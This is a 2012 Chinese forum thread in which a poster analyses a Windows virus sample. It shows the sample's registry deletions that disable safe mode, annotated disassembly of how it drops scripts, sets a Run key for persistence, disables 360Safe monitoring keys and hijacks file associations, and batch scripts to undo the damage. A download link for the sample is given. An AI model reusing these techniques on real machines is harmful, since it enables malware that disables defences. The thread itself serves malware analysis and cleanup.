删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\”)

继续:
<STRONG>0040DFA4 83C4 10 add esp,0x10
0040DFA7 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040DFAA 68 DABA4000 push 样本.0040BADA ; ASCII ".vbs"
0040DFAF FF75 EC push dword ptr ss:[ebp-0x14]
0040DFB2 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32"
0040DFB7 FF75 FC push dword ptr ss:[ebp-0x4]
0040DFBA B9 04000000 mov ecx,0x4
0040DFBF E8 35E1FFFF call 样本.0040C0F9 ;生成一个43.vbs。。。位于("C:\WINDOWS\system32\43.vbs")
0040E08F 83C4 10 add esp,0x10
0040E092 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040E095 68 EBBA4000 push 样本.0040BAEB ; ASCII ".bat"
0040E09A FF75 EC push dword ptr ss:[ebp-0x14]
0040E09D 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32"
0040E0A2 FF75 FC push dword ptr ss:[ebp-0x4]
0040E0A5 B9 04000000 mov ecx,0x4
0040E0AA E8 4AE0FFFF call 样本.0040C0F9 ;生成一个24.bat。。。位于(ASCII "C:\WINDOWS\system32\24.bat")
0040E1B3 83C4 10 add esp,0x10
0040E1B6 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040E1B9 68 EBBA4000 push 样本.0040BAEB ; ASCII ".bat"
0040E1BE FF75 EC push dword ptr ss:[ebp-0x14]
0040E1C1 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32"
0040E1C6 FF75 FC push dword ptr ss:[ebp-0x4]
0040E1C9 B9 04000000 mov ecx,0x4
0040E1CE E8 26DFFFFF call 样本.0040C0F9 ;生成一个59.bat。。。(ASCII "C:\WINDOWS\system32\59.bat")

0040E29E 83C4 10 add esp,0x10
0040E2A1 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040E2A4 68 DABA4000 push 样本.0040BADA ; ASCII ".vbs"
0040E2A9 FF75 EC push dword ptr ss:[ebp-0x14]
0040E2AC 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32"
0040E2B1 FF75 FC push dword ptr ss:[ebp-0x4]
0040E2B4 B9 04000000 mov ecx,0x4
0040E2B9 E8 3BDEFFFF call 样本.0040C0F9 ;生成一个6.vbs。。。位于 (ASCII "C:\WINDOWS\system32\6.vbs")
0040E2F7 50 push eax
0040E2F8 68 04000080 push 0x80000004
0040E2FD 6A 00 push 0x0
0040E2FF 68 85BB4000 push 样本.0040BB85 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe"
0040E304 68 01030080 push 0x80000301
0040E309 6A 00 push 0x0
0040E30B 68 04000000 push 0x4
0040E310 68 03000000 push 0x3
0040E315 BB A4060000 mov ebx,0x6A4
0040E31A E8 09020000 call 样本.0040E528
0040E31F 83C4 28 add esp,0x28
0040E322 8B5D E8 mov ebx,dword ptr ss:[ebp-0x18]
0040E325 85DB test ebx,ebx
0040E327 74 09 je short 样本.0040E332
0040E329 53 push ebx
0040E32A E8 FF010000 call 样本.0040E52E
0040E32F 83C4 04 add esp,0x4
0040E332 68 01030080 push 0x80000301
0040E337 6A 00 push 0x0
0040E339 68 01000000 push 0x1
0040E33E 68 04000080 push 0x80000004
0040E343 6A 00 push 0x0
0040E345 68 92914000 push 样本.00409192 ; ASCII "SOFTWARE\360Safe\safemon\ExecAccess"
0040E34A 68 01030080 push 0x80000301
0040E34F 6A 00 push 0x0
0040E351 68 04000000 push 0x4
0040E356 68 03000000 push 0x3
0040E35B BB A4060000 mov ebx,0x6A4
0040E360 E8 C3010000 call 样本.0040E528 ; 将ExecAccess键值重新设置成1
0040E365 83C4 28 add esp,0x28
0040E368 68 01030080 push 0x80000301
0040E36D 6A 00 push 0x0
0040E36F 68 01000000 push 0x1
0040E374 68 04000080 push 0x80000004
0040E379 6A 00 push 0x0
0040E37B 68 B6914000 push 样本.004091B6 ; ASCII "SOFTWARE\360Safe\safemon\MonAccess"
0040E380 68 01030080 push 0x80000301
0040E385 6A 00 push 0x0
0040E387 68 04000000 push 0x4
0040E38C 68 03000000 push 0x3
0040E391 BB A4060000 mov ebx,0x6A4
0040E396 E8 8D010000 call 样本.0040E528 ; 将MonAccess键值设置成1
0040E39B 83C4 28 add esp,0x28
0040E39E 68 01030080 push 0x80000301
0040E3A3 6A 00 push 0x0
0040E3A5 68 01000000 push 0x1
0040E3AA 68 04000080 push 0x80000004
0040E3AF 6A 00 push 0x0
0040E3B1 68 D9914000 push 样本.004091D9 ; ASCII "SOFTWARE\360Safe\safemon\SiteAccess"
0040E3B6 68 01030080 push 0x80000301
0040E3BB 6A 00 push 0x0
0040E3BD 68 04000000 push 0x4
0040E3C2 68 03000000 push 0x3
0040E3C7 BB A4060000 mov ebx,0x6A4
0040E3CC E8 57010000 call 样本.0040E528 ; 将SiteAccess键值设置成1
0040E3D1 83C4 28 add esp,0x28
0040E3D4 68 01030080 push 0x80000301
0040E3D9 6A 00 push 0x0
0040E3DB 68 01000000 push 0x1
0040E3E0 68 04000080 push 0x80000004
0040E3E5 6A 00 push 0x0
0040E3E7 68 FD914000 push 样本.004091FD ; ASCII "SOFTWARE\360Safe\safemon\UDiskAccess"
0040E3EC 68 01030080 push 0x80000301
0040E3F1 6A 00 push 0x0
0040E3F3 68 04000000 push 0x4
0040E3F8 68 03000000 push 0x3
0040E3FD BB A4060000 mov ebx,0x6A4
0040E402 E8 21010000 call 样本.0040E528 ; 将UDiskAccess键值设置成1



0040E40A 68 04000080 push 0x80000004
0040E40F 6A 00 push 0x0
0040E411 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040E416 68 04000080 push 0x80000004
0040E41B 6A 00 push 0x0
0040E41D 68 BFBB4000 push 样本.0040BBBF ; ASCII ".reg"
0040E422 68 01030080 push 0x80000301
0040E427 6A 00 push 0x0
0040E429 68 01000000 push 0x1
0040E42E 68 03000000 push 0x3
0040E433 BB A4060000 mov ebx,0x6A4
0040E438 E8 EB000000 call 样本.0040E528

修改.reg文件关联。

0040E440 68 04000080 push 0x80000004
0040E445 6A 00 push 0x0
0040E447 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040E44C 68 04000080 push 0x80000004
0040E451 6A 00 push 0x0
0040E453 68 C5BB4000 push 样本.0040BBC5 ; ASCII ".exe"
0040E458 68 01030080 push 0x80000301
0040E45D 6A 00 push 0x0
0040E45F 68 01000000 push 0x1
0040E464 68 03000000 push 0x3
0040E469 BB A4060000 mov ebx,0x6A4
0040E46E E8 B5000000 call 样本.0040E528

修改.exe文件关联

0040E49D 6A 00 push 0x0
0040E49F 6A 00 push 0x0
0040E4A1 6A 00 push 0x0
0040E4A3 68 01030080 push 0x80000301
0040E4A8 6A 00 push 0x0
0040E4AA 68 14000000 push 0x14
0040E4AF 68 04000080 push 0x80000004
0040E4B4 6A 00 push 0x0
0040E4B6 68 DA904000 push 样本.004090DA
0040E4BB 68 03000000 push 0x3
0040E4C0 BB 00030000 mov ebx,0x300
0040E4C5 E8 5E000000 call 样本.0040E528 //弹出最开始的窗口
0040E4CA 83C4 28 add esp,0x28
0040E4CD 8BE5 mov esp,ebp
0040E4CF 5D pop ebp
0040E4D0 C3 retn //结束</STRONG>
代码就分析到这儿了。
解决方法:
  中毒之后,一些inf,txt,exe,reg 都不能用。。。 这儿就想到了他没限制.bat和.vbs。 可能是因为他自己在运行的时候也需要运行.bat和.vbs的文件吧。。。 这儿就是突破口。
不能右键新建文件, 那就直接把一个文件的后缀修改成“.c”。直接就把病毒本体修改成“.c” 双击,可以打开,删除里面所有乱七八糟的东西,我们向里面输入:
@echo off
gpedit.msc
pause&exit
打开“组策略”,依次点:用户配置---管理模板---系统  在右边可以看到“阻止访问注册表编辑工具”打开之后,选中“已禁用”,然后保存退出。
设置成功之后,向.bat文件中输入
@echo off
regedit.exe
pause&exit
保存。打开,这样就可以打开注册表编辑器了。。。接下来就把他所修改了的注册表键值全部修改回去就可以了。。。
修改文件关联也用批处理:(以更改exe为例)
@echo off
assoc .exe=exefile
ftype exefile="%1"%*
pause&exit
处理完之后用杀软杀杀毒吧

ps:菜鸟,有什么地方分析得不对和分析得不全面的地方,请各位大大多多指教 。。。





internet

样本.rar

512.33 KB, 下载次数: 82, 下载积分: 吾爱币 -1 CB

密码52pojie

免费评分

参与人数 1威望 +1 热心值 +1 收起 理由
willJ + 1 + 1 不错哦,继续加油!!!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复

举报

530530
头像被屏蔽
530530 发表于 2012-9-17 19:59
这些小病毒 很容易KO。
【吾爱破解论坛总版规】 - [让你充分了解吾爱破解论坛行为规则]
回复 支持

举报

Hmily
Hmily 发表于 2012-10-21 23:46
吾爱破解论坛没有任何官方QQ群,禁止留联系方式,禁止任何商业交易。
分析的很详细,不错,期待楼主又更多精彩的文章。
如何升级?如何获得积分?积分对应解释说明!
回复 支持

举报

luoyongquan
luoyongquan 发表于 2012-10-31 18:57
《站点帮助文档》有什么问题来这里看看吧,这里有你想知道的内容!
看不明白
呼吁大家发布原创作品添加吾爱破解论坛标识!
回复 支持

举报

WinDebug
WinDebug 发表于 2012-11-7 00:31
楼主,这个程序是边弹窗边执行相应功能吗,是不是每个call里面都有相应的函数来调用额。。。新手学习了。。。
如何快速判断一个文件是否为病毒!
回复 支持

举报

ygw0577
ygw0577 发表于 2012-11-10 08:34
看不懂 看来我还有一段很长的路要走
回复 支持

举报

yi7503
yi7503 发表于 2012-11-11 15:54
看不明白
回复 支持

举报

弥生°
弥生° 发表于 2012-11-18 14:05
真心不明白。
回复 支持

举报

我从凡间来
我从凡间来 发表于 2012-11-19 16:41
单纯的看那些注册表的值,我估计我中了这种病毒只有重装了,我都纳闷,那些值你是怎么记着的
回复 支持

举报

18835595892
18835595892 发表于 2012-11-24 04:59
病毒只有重装了
回复 支持

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-28 07:25

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表